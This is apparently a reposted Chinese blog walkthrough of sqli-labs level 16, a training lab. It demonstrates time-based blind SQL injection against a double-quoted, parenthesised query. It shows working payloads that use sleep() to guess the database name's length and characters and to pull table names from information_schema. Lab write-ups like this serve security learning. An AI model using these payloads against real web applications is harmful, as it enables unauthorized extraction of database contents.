現實證明 英語好才能學滲透

基于bool類型的時間盲注 雙引號

0X01愛之初體驗

說實話我還沒有找到 盲注的時候怎么判斷閉合的方法

so 這里我直接看源碼

?

這里的語句應該是 （“”）這種的閉合形式

so我們嘗試一下

") and if(ascii(substr((select database()) ,1,1))>116,1,sleep(5))#

看看能能不正常執行

?

那來試試這個

") and if(ascii(substr((select database()) ,1,1))=115,1,sleep(5))#

?

?正確的時候響應是一秒鐘 所以存在時間注入

那我們來嘗試一下爆破數據庫名的長度

admin") and if(length((select database()))>8,1,sleep(5))#

然后后面的方法就一樣看

那我們來嘗試一下爆破 第一個表的第一個字母

admin") and if(ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),1,1))>100,0,sleep(5))#

nice 后面構造語法就行

切記 學習之路 無浮躁

少就是多 慢就是快

轉載于:https://www.cnblogs.com/-zhong/p/10922091.html

總結

以上是生活随笔為你收集整理的sqli-lab（16）的全部內容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網站內容還不錯，歡迎將生活随笔推薦給好友。